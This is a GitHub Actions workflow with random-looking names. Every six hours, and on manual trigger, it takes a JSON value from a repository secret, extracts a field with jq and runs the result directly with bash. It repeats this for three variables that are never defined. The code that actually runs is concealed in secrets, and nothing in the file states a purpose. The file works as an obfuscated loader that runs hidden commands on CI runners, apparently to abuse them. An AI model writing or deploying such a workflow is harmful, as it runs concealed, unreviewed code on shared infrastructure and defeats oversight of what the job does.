name: mifadong6418
on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mifadong6418
        env:
          pie494: ${{ secrets.pie494 }}
        run: |
          echo $pie494 | jq -r .jv750 | /bin/bash
          echo $qyl1433 | jq -r .a35 | /bin/bash
          echo $t06 | jq -r .k0612 | /bin/bash
          echo $b639 | jq -r .hmpyq5 | /bin/bash

